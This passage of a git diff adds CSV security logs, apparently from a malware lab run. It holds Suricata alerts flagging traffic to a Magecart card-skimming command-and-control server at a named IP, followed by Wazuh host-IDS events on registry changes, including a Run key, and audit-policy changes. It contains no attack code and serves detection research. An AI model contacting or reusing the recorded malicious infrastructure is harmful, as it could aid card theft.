Traffic] [Priority: 2] {UDP} 172.16.2.2:59009 -> 172.16.2.1:53","/var/log/suricata/fast.log" 
+"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:14.192921 [**] [1:2012810:11] ET POLICY HTTP Request to a *.tk domain [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 172.16.2.2:50024 -> 195.20.40.139:80","/var/log/suricata/fast.log"
+"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:14.917195 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50027 -> 37.46.135.58:443","/var/log/suricata/fast.log"
+"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:14.918585 [**] [1:2029204:1] ET MALWARE Observed Magecart CnC Domain in TLS SNI [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50028 -> 37.46.135.58:443","/var/log/suricata/fast.log"
+"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:15.045785 [**] [1:2029205:1] ET MALWARE Malicious SSL Cert (Magecart) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 37.46.135.58:443 -> 172.16.2.2:50028","/var/log/suricata/fast.log"
+"May 28, 2020 @ 13:34:15.481","05/28/2020-13:34:15.045756 [**] [1:2029205:1] ET MALWARE Malicious SSL Cert (Magecart) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 37.46.135.58:443 -> 172.16.2.2:50027","/var/log/suricata/fast.log"
diff --git a/data/MW_14_HIDS_1.csv b/data/MW_14_HIDS_1.csv
new file mode 100644
index 0000000..ae4b3f7
--- /dev/null
+++ b/data/MW_14_HIDS_1.csv
@@ -0,0 +1,403 @@
+timestamp,"rule.level","rule.description","full_log"
+"Apr 4, 2020 @ 16:16:38.695",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",
+"Apr 4, 2020 @ 16:12:27.693",8,"Windows Audit Policy changed",
+"Apr 4, 2020 @ 16:12:27.709",8,"Windows Audit Policy changed",
+"Apr 4, 2020 @ 16:12:00.191",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed.
+Old md5sum was: '7f7895b6541198159e50203364165ec9'
+New md5sum is : '67c10bdce559c177fe0d89a2be194410'
+Old sha1sum was: '7a8c02e89ba494c6cf5eca3c6098625f21e80c37'
+New sha1sum is : '4bac1afb15742d4fecc03d097a595ea33eed5376'
+"
+"Apr 4, 2020 @ 16:12:01.348",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed.
+Old md5sum was: '0b1bbc23c8320ebaa46b388a8da7c6a9'
+New md5sum is : '342765c52f3fd7b50e5188adb30a0ede'
+Old sha1sum was: '4966aaba620e10c35307a3970fa16720b5b3ee41'
+New sha1sum is : '6d803f7cc7de0ae861402e45b8a1442595a4b544'
+"
+"Apr 4, 2020 @ 16:12:01.519",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed.
+Old md5sum was: '3f249139b0d337814b631741efaf7513'
+New md5sum is : 'f6949813e6b9d992278b95b7f209e047'
+Old sha1sum was: 'ca9d4b294b5958cd508120069d9948cb69c6e833'
+New sha1sum is : '8db1fc943f83c30b4bc07f1ed394492c392e7722'
+"
+"Apr 4, 2020 @ 16:12:04.504",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed.
+Old md5sum was: '66b96bd81f9950113fd4425704f7bda3' +New md5sum is : 'b132e65b4963a54ebee91bcab8914621' +Old sha1sum was: '1e83204dc583496e67da65894044bdf1ca0303b1' +New sha1sum is : '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +" +"Apr 4, 2020 @ 16:12:05.198",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '7f7895b6541198159e50203364165ec9' +New md5sum is : '67c10bdce559c177fe0d89a2be194410' +Old sha1sum was: '7a8c02e89ba494c6cf5eca3c6098625f21e80c37' +New sha1sum is : '4bac1afb15742d4fecc03d097a595ea33eed5376' +" +"Apr 4, 2020 @ 16:12:06.442",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'a57532e14922dfab247f58c904256054' +New md5sum is : 'a6934418b12b085c34f2dbaa9e9fa7a0' +Old sha1sum was: '73e81b85db6c7311ac6d78473421beead8c2fa85' +New sha1sum is : 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +" +"Apr 4, 2020 @ 16:12:07.254",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '32f49dc9c0bd631f1041000cd529ee12' +New md5sum is : '619d435b1dac461a9b0cfd3b48ee8f37' +Old sha1sum was: '35d438babd0c920262e2ceb9dd730890a06d7f1f' +New sha1sum is : '95d0826303f42e23fada9a211bd9ea71de2d5c51' +" +"Apr 4, 2020 @ 16:12:07.269",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'eebbaeccf2053b4e942904aaec0f7896' +New md5sum is : 'f65ebed619edcfc8fafe21f958215b53' +Old sha1sum was: '9dd858bced21c65aa5319c959b4d2ce392720739' +New sha1sum is : '493297f96d762981a98fbe5f8c5b5782c30b65aa' +" +"Apr 4, 2020 @ 16:12:07.301",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. 
+Old md5sum was: '729d0877659e4797d3983fddb4576047' +New md5sum is : 'f7ede040f0bd50f2432cce9ba9720243' +Old sha1sum was: '109945df285ffff37e08eaab1d91e55cb59c26c8' +New sha1sum is : '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +" +"Apr 4, 2020 @ 16:12:18.191",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '20aef581d174f76f785f43f44225eb31' +New md5sum is : 'a0df8d6e879d924da3288b2aa0b85114' +Old sha1sum was: '192912dff5c122eb81d0883a93a3ca18c14d8395' +New sha1sum is : '5b3369bb152c26552a26be399f0ea043686a36fe' +" +"Apr 4, 2020 @ 16:12:18.207",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '9caad04c60da0603e243cab89500f32c' +New md5sum is : '93c2f688a68bea92ca0316b543b731f9' +Old sha1sum was: '7750760bf5d77d822ab8a47b63527c18e3deb347' +New sha1sum is : '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +" +"Apr 4, 2020 @ 16:12:19.442",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: '822cb403c72a645a692b783c441badfe' +New md5sum is : 'eec716ae7b147d80b2bff4d347692f12' +Old sha1sum was: 'bf360e08c45c4932bb574c7e442b62cc38e9bd46' +New sha1sum is : '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +" +"Apr 4, 2020 @ 16:12:19.457",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. 
+Old md5sum was: '822cb403c72a645a692b783c441badfe' +New md5sum is : 'eec716ae7b147d80b2bff4d347692f12' +Old sha1sum was: 'bf360e08c45c4932bb574c7e442b62cc38e9bd46' +New sha1sum is : '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +" +"Apr 4, 2020 @ 16:14:50.123",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : '25944595463a586634e109642d89564d' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : '015ecdfcfd301c840ba78a390a8f86ae7c746ac6' +" +"Apr 4, 2020 @ 16:14:50.170",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : '9fc194a140b0be6ac72833e1d35cc295' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : '7de9c71bb653c36c522898cc0dc54c4f991b8ab8' +" +"Apr 4, 2020 @ 16:16:29.430",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 4, 2020 @ 16:18:07.461",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '25944595463a586634e109642d89564d' +New md5sum is : '59e568d6746d2d88bb098f738db7991a' +Old sha1sum was: '015ecdfcfd301c840ba78a390a8f86ae7c746ac6' +New sha1sum is : '6184f529e3997b812640b91eeb93958f3c47e783' +" +"Apr 4, 2020 @ 16:18:07.493",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '9fc194a140b0be6ac72833e1d35cc295' +New md5sum is : '9185fd36db1bd6118b3e24fbd805cc14' +Old sha1sum was: '7de9c71bb653c36c522898cc0dc54c4f991b8ab8' +New sha1sum is : '8aef298447fc4eb5f04b80caf615863b8f4a2cb2' +" +"Apr 4, 2020 @ 16:18:07.525",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : 'c9ae14228eb75233f46a647bd8ecf266' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : '0b2ed0eebdb55e9c21c0ceda92ca10a1b24cf98f' +" +"Apr 4, 2020 @ 16:18:12.510",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '4da67f451f88e7056f9dba90376776a6' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'f6a4e7b5478cceb18ddc90d64f0fd8ee468eb464' +" +"Apr 4, 2020 @ 16:18:15.415",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '9787acee89ed88dcc39dbb7691eb4dbb' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : 'f8551a156313a24029a46c29cfbdd3232037dc25' +" +"Apr 4, 2020 @ 16:18:22.759",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. 
+Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : '510c4207e7342db8068ac886de23ed23' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : 'd9d3280a2201092d8978caa389b28d79360992b5' +" +"Apr 4, 2020 @ 16:18:30.228",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 4, 2020 @ 16:18:31.182",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'f66ace1e437ff765e5bb1cd2a053108b' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '843ed546a4eabaa4e72e86e2213d9f025b390ff8' +" +"Apr 4, 2020 @ 16:18:31.868",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : 'd38ad2c6b0d7c8c4f04b71f074e963d5' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : 'd06e2d9ef1c3c90b95a9f75b3ece0079e79158f2' +" +"Apr 4, 2020 @ 16:18:34.432",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'f66ace1e437ff765e5bb1cd2a053108b' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '843ed546a4eabaa4e72e86e2213d9f025b390ff8' +" +"Apr 4, 2020 @ 16:18:35.759",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. 
+Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : 'd762591e4370626d72c1cc6d16bee312' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : '28f755a9e787435c98285c84f2c0e2744cd68d2a' +" +"Apr 4, 2020 @ 16:18:40.010",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : 'da4f85e20cce8bd73789dedd2af02ea0' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : '7a965da944bbb5b71bfc326697eeff0a93a29316' +" +"Apr 4, 2020 @ 16:18:42.697",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : 'f5c3741ded4afb44c4ec6bdfe584c678' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : '57a3678143fc80206d40c79a27e8510887900131' +" +"Apr 4, 2020 @ 16:18:44.587",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'f66ace1e437ff765e5bb1cd2a053108b' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '843ed546a4eabaa4e72e86e2213d9f025b390ff8' +" +"Apr 4, 2020 @ 16:18:51.572",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 4, 2020 @ 16:18:56.072",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. 
+Old md5sum was: '0a11a072fc5a95522aa8ca6087115073' +New md5sum is : 'e7da235d7443b87ea4d5d1ef32857357' +Old sha1sum was: '7afc9a8039fc019833a674d4b24d2aac0c3bec0f' +New sha1sum is : 'c355c6c799dda0b3767d88f9d370687b8dcadb06' +" +"Apr 4, 2020 @ 16:18:56.088",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : '671078222c6f28f8a987ef233af7d5a5' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'c62d69328b5a046dd8494e6a38df8074f8310102' +" +"Apr 4, 2020 @ 16:18:56.150",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '7528347030eb2939f7bd7e7c337611a6' +New md5sum is : '967d20a0cc81220ee8b6adb97b4e1849' +Old sha1sum was: '2c1692bd6f429b9f9663e52e47b6e21760563671' +New sha1sum is : '95c2b07c8c10334fd0ea174fac97a010ee7d6069' +" +"Apr 4, 2020 @ 16:18:56.542",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: 'b3d8a6dbf28322bf04b2134bc9036134' +New md5sum is : '7a8fc575d832d0c5eeb4061229401639' +Old sha1sum was: '7c42438e68109c5b3296f5525de081033dbfb763' +New sha1sum is : 'd246f577ebd47911f243e53ec431d5d1daf7604a' +" +"Apr 4, 2020 @ 16:18:58.245",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. 
+Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 4, 2020 @ 16:19:01.760",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'bb30a4865d0fe96a2d7b53b843e8fa0a' +New md5sum is : 'b9c54484acb8fd7d86fe1f5ae0437eec' +Old sha1sum was: '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +New sha1sum is : 'f86179bd767dbce11644bc86f37f50a8c6f641cc' +" +"Apr 4, 2020 @ 16:19:05.822",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '4da67f451f88e7056f9dba90376776a6' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'f6a4e7b5478cceb18ddc90d64f0fd8ee468eb464' +" +"Apr 4, 2020 @ 16:19:06.917",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '342765c52f3fd7b50e5188adb30a0ede' +New md5sum is : '5d068fc32661972e5679bac200c857e4' +Old sha1sum was: '6d803f7cc7de0ae861402e45b8a1442595a4b544' +New sha1sum is : '3a2a505ea7a54cf41213e78cb4f3effb73b5c183' +" +"Apr 4, 2020 @ 16:19:07.120",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'f6949813e6b9d992278b95b7f209e047' +New md5sum is : '65516ff04f2a5ff2357c6826a3aff112' +Old sha1sum was: '8db1fc943f83c30b4bc07f1ed394492c392e7722' +New sha1sum is : '134b952f9d4997633cc8119d4d8f73e9cbe2d5b4' +" +"Apr 4, 2020 @ 16:19:07.869",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'b132e65b4963a54ebee91bcab8914621' +New md5sum is : '3d820f638437f474d6720f1c4240374c' +Old sha1sum was: '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +New sha1sum is : 'd40209cc85fb7d124f799b363577b63b92e4ae03' +" +"Apr 4, 2020 @ 16:19:08.135",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '4da67f451f88e7056f9dba90376776a6' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'f6a4e7b5478cceb18ddc90d64f0fd8ee468eb464' +" +"Apr 4, 2020 @ 16:19:09.509",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'a6934418b12b085c34f2dbaa9e9fa7a0' +New md5sum is : 'e54d8343bc850868b43e4fa8d062daa5' +Old sha1sum was: 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +New sha1sum is : '5faa99bf27762d4e2f292d00958e4d94d47a450e' +" +"Apr 4, 2020 @ 16:19:10.244",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '4f49d27ac0de2bea2feb85b2caf49c7f' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '3198f8ed333450aa4be21ed1f640fb9cfe511aa0' +" +"Apr 4, 2020 @ 16:19:10.275",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : '27d574b090055971b30f9847a86f1b99' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : 'd55221c113fd40276e15c43c6c761b49af64643d' +" +"Apr 4, 2020 @ 16:19:10.323",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '729d0877659e4797d3983fddb4576047' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '109945df285ffff37e08eaab1d91e55cb59c26c8' +" +"Apr 4, 2020 @ 16:19:20.823",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a0df8d6e879d924da3288b2aa0b85114' +New md5sum is : '66412b599c9052ba1a1c9e08b7abbe7c' +Old sha1sum was: '5b3369bb152c26552a26be399f0ea043686a36fe' +New sha1sum is : '9268e8b2e326583f233d96d8b6fe32e48969274e' +" +"Apr 4, 2020 @ 16:19:20.854",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. 
+Old md5sum was: '93c2f688a68bea92ca0316b543b731f9' +New md5sum is : '78e6332dc13f45b431b234040dc6c45a' +Old sha1sum was: '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +New sha1sum is : 'c71a1f75575f97e8ce9571f3ba2fd1e8c4b53f28' +" +"Apr 4, 2020 @ 16:15:14.767",5,"WSearch was unavailable to handle a notification event", +"Apr 4, 2020 @ 16:15:14.781",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 16:16:30.212",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 16:16:40.633",5,"Logon Failure - Unknown user or bad password", +"Apr 4, 2020 @ 16:16:41.804",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 16:16:42.073",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 16:16:45.290",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 4, 2020 @ 16:18:04.650",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:04.681",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:07.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:07.884",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:08.664",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:08.680",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 16:18:08.696",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e\TriggerInfo\1' was added. 
+" +"Apr 4, 2020 @ 16:18:08.711",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 16:18:08.727",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e\TriggerInfo\3' was added. +" +"Apr 4, 2020 @ 16:18:08.758",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 16:18:08.774",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:10.993",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:11.024",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:11.103",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:11.118",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:11.337",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:11.352",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:12.665",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:12.681",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_29f1e' was added. 
+" +"Apr 4, 2020 @ 16:18:12.852",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:12.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:13.447",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:13.462",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:13.759",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:13.775",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_29f1e' 